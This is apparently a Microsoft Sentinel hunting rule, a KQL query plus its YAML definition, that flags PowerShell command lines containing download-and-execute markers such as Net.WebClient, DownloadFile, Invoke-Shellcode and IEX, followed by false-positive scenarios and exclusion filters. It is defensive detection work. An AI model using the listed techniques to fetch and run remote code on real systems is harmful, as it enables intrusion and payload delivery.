Unusual PowerShell execution events that involve downloading files may indicate an adversary attempting to exfiltrate data or deploy malicious payloads. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential compromise early and prevent lateral movement or data theft.
KQL Query
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "powershell_ise.exe")
| where ProcessCommandLine has "Net.WebClient"
or ProcessCommandLine has "DownloadFile"
or ProcessCommandLine has "Invoke-WebRequest"
or ProcessCommandLine has "Invoke-Shellcode"
or ProcessCommandLine has "http"
or ProcessCommandLine has "IEX"
or ProcessCommandLine has "Start-BitsTransfer"
or ProcessCommandLine has "mpcmdrun.exe"
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine
| top 100 by Timestamp
id: c34d1d0e-1cf4-45d0-b628-a2cfde329182
name: PowerShell downloads
description: |
Finds PowerShell execution events that could involve a download.
requiredDataConnectors:
- connectorId: MicrosoftThreatProtection
dataTypes:
- DeviceProcessEvents
query: |
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "powershell_ise.exe")
| where ProcessCommandLine has "Net.WebClient"
or ProcessCommandLine has "DownloadFile"
or ProcessCommandLine has "Invoke-WebRequest"
or ProcessCommandLine has "Invoke-Shellcode"
or ProcessCommandLine has "http"
or ProcessCommandLine has "IEX"
or ProcessCommandLine has "Start-BitsTransfer"
or ProcessCommandLine has "mpcmdrun.exe"
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine
| top 100 by Timestamp
| Sentinel Table | Notes |
|---|---|
DeviceProcessEvents | Ensure this data connector is enabled |
Scenario: A system administrator is using PowerShell to download a software update from a trusted internal repository.
Filter/Exclusion: Check the URL or file path against a whitelist of known internal update servers (e.g., internal-update-server.com or \\fileserver\updates).
Scenario: A scheduled job runs a PowerShell script to fetch configuration data from a central management system.
Filter/Exclusion: Exclude events where the script path contains known configuration management tools (e.g., C:\Program Files\SCCM\ or C:\Windows\System32\GroupPolicy).
Scenario: An IT support team uses PowerShell to download diagnostic tools from a company-approved download site.
Filter/Exclusion: Filter out events where the download source is a known internal tool repository (e.g., https://download.tools.corp.example.com).
Scenario: A user runs a PowerShell script to generate a report that requires downloading a template file from a shared network drive.
Filter/Exclusion: Exclude events where the file path is within a shared network directory (e.g., \\fileserver\shared\templates) or the script is located in a known reporting tool directory.
Scenario: A DevOps engineer uses PowerShell to pull a Docker image from a private registry during a CI/CD pipeline.
Filter/Exclusion: Exclude events where the command includes a known CI/CD tool or registry (e.g., docker pull or registry.corp.example.com).